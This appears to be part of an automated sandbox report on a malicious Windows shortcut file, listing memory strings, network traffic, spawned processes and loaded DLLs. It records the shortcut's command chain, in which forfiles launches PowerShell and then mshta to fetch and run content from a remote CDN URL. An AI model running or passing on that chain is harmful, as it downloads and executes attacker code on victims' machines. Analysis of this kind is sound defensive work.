Source: mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.dr	String found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-400-normal.woff)
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.dr	String found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-400-normal.woff2)
Source: css[1].css.4.dr	String found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-500-normal.woff)
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7840000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.dr	String found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-500-normal.woff2)
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2698471609.00000271E560A000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.dr	String found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-700-normal.woff)
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2698471609.00000271E560A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2700827513.00000279E7840000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.dr	String found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-700-normal.woff2)
Source: mshta.exe, 00000004.00000002.2698471609.00000271E560A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2698471609.00000271E5566000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2700827513.00000279E7840000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.dr	String found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-900-normal.woff)
Source: mshta.exe, 00000004.00000002.2698471609.00000271E560A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2700827513.00000279E7840000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.dr	String found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-cyrillic-ext-900-normal.woff2)
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.dr	String found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-hebrew-300-normal.woff)
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.dr	String found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-hebrew-300-normal.woff2)
Source: css[1].css.4.dr	String found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-hebrew-400-normal.woff)
Source: css[1].css.4.dr	String found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-hebrew-400-normal.woff2)
Source: css[1].css.4.dr	String found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-hebrew-500-normal.woff)
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.dr	String found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-hebrew-500-normal.woff2)
Source: css[1].css.4.dr	String found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-hebrew-700-normal.woff)
Source: css[1].css.4.dr	String found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-hebrew-700-normal.woff2)
Source: css[1].css.4.dr	String found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-hebrew-900-normal.woff)
Source: css[1].css.4.dr	String found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-hebrew-900-normal.woff2)
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2700827513.00000279E781C000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.dr	String found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-latin-300-normal.woff)
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2700827513.00000279E781C000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.dr	String found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-latin-300-normal.woff2)
Source: css[1].css.4.dr	String found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-latin-400-normal.woff)
Source: css[1].css.4.dr	String found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-latin-400-normal.woff2)
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.dr	String found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-latin-500-normal.woff)
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.dr	String found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-latin-500-normal.woff2)
Source: css[1].css.4.dr	String found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-latin-700-normal.woff)
Source: css[1].css.4.dr	String found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-latin-700-normal.woff2)
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.dr	String found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-latin-900-normal.woff)
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.dr	String found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-latin-900-normal.woff2)
Source: css[1].css.4.dr	String found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-latin-ext-300-normal.woff)
Source: css[1].css.4.dr	String found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-latin-ext-300-normal.woff2)
Source: css[1].css.4.dr	String found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-latin-ext-400-normal.woff)
Source: css[1].css.4.dr	String found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-latin-ext-400-normal.woff2)
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7840000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.dr	String found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-latin-ext-500-normal.woff)
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7826000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.dr	String found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-latin-ext-500-normal.woff2)
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2698471609.00000271E560A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2700827513.00000279E7840000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.dr	String found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-latin-ext-700-normal.woff)
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7837000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2698471609.00000271E560A000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.dr	String found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-latin-ext-700-normal.woff2)
Source: mshta.exe, 00000004.00000002.2698471609.00000271E560A000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.dr	String found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-latin-ext-900-normal.woff)
Source: mshta.exe, 00000004.00000002.2698471609.00000271E560A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2700827513.00000279E7840000.00000004.00000020.00020000.00000000.sdmp, css[1].css.4.dr	String found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-latin-ext-900-normal.woff2)
Source: mshta.exe, 00000004.00000002.2700827513.00000279E7840000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fonts.bunny.net/rubik/files/rubik-latinD
Source: edb.log.6.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 00000006.00000003.1498181186.000001BD6B320000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.dr, edb.log.6.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2/C:
Source: mshta.exe, 00000004.00000002.2698471609.00000271E55F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: mshta.exe, 00000004.00000002.2698471609.00000271E55B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vidstreemz.b-cdn.net/
Source: mshta.exe, 00000004.00000002.2698471609.00000271E5540000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2700827513.00000279E7898000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2698471609.00000271E55B6000.00000004.00000020.00020000.00000000.sdmp, 8t6beMY1wO.lnk	String found in binary or memory: https://vidstreemz.b-cdn.net/nexto
Source: powershell.exe	String found in binary or memory: https://vidstreemz.b-cdn.net/nexto$global:?
Source: mshta.exe, 00000004.00000002.2698471609.00000271E5566000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vidstreemz.b-cdn.net/nexto(
Source: mshta.exe, 00000004.00000002.2700827513.00000279E77E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vidstreemz.b-cdn.net/nexto...
Source: mshta.exe, 00000004.00000002.2698471609.00000271E5566000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vidstreemz.b-cdn.net/nexto.n
Source: mshta.exe, 00000004.00000002.2698471609.00000271E5566000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vidstreemz.b-cdn.net/nexto5m
Source: mshta.exe, 00000004.00000002.2698471609.00000271E5566000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vidstreemz.b-cdn.net/nexto;
Source: mshta.exe, 00000004.00000002.2698471609.00000271E5540000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vidstreemz.b-cdn.net/nextoC:
Source: mshta.exe, 00000004.00000002.2699345662.00000271E5740000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vidstreemz.b-cdn.net/nextoFPS_BROWSER_AP
Source: forfiles.exe, 00000000.00000002.1463995255.00000204B96F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vidstreemz.b-cdn.net/nextoFi?
Source: mshta.exe, 00000004.00000002.2699008025.00000271E5690000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://vidstreemz.b-cdn.net/nextoH
Source: mshta.exe, 00000004.00000002.2698471609.00000271E5566000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vidstreemz.b-cdn.net/nextoM
Source: mshta.exe, 00000004.00000002.2698471609.00000271E5566000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vidstreemz.b-cdn.net/nextoY
Source: mshta.exe, 00000004.00000002.2700827513.00000279E77F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vidstreemz.b-cdn.net/nextoc
Source: mshta.exe, 00000004.00000002.2697931791.0000008398745000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://vidstreemz.b-cdn.net/nextoi
Source: mshta.exe, 00000004.00000002.2698471609.00000271E5566000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vidstreemz.b-cdn.net/nextonAsV
Source: mshta.exe, 00000004.00000002.2698471609.00000271E5566000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vidstreemz.b-cdn.net/nextop
Source: mshta.exe, 00000004.00000002.2700827513.00000279E77F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vidstreemz.b-cdn.net/nextot-logo.svg0
Source: mshta.exe, 00000004.00000002.2698471609.00000271E55B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vidstreemz.b-cdn.net/nextoubik:300

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704

Source: unknown	HTTPS traffic detected: 138.199.36.7:443 -> 192.168.2.8:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 169.150.247.37:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 169.150.247.39:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 169.150.236.104:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 169.150.247.36:443 -> 192.168.2.8:49709 version: TLS 1.2

System Summary

Windows shortcut file (LNK) contains suspicious command line arguments

Source: 8t6beMY1wO.lnk

LNK file: /p C:\Windows /m win.ini /c "powershell . mshta https://vidstreemz.b-cdn.net/nexto"

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Source: unknown	Process created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p C:\Windows /m win.ini /c "powershell . mshta https://vidstreemz.b-cdn.net/nexto"
Source: C:\Windows\System32\forfiles.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe . mshta https://vidstreemz.b-cdn.net/nexto
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://vidstreemz.b-cdn.net/nexto
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\forfiles.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe . mshta https://vidstreemz.b-cdn.net/nexto	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://vidstreemz.b-cdn.net/nexto	Jump to behavior

Source: C:\Windows\System32\forfiles.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: imgutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior

